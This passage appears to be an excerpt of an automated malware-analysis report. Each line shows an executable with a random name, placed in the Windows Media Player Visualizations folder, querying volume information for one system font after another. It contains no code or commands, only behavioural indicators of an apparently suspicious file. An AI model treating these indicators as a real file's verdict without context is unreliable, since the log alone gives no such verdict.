                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
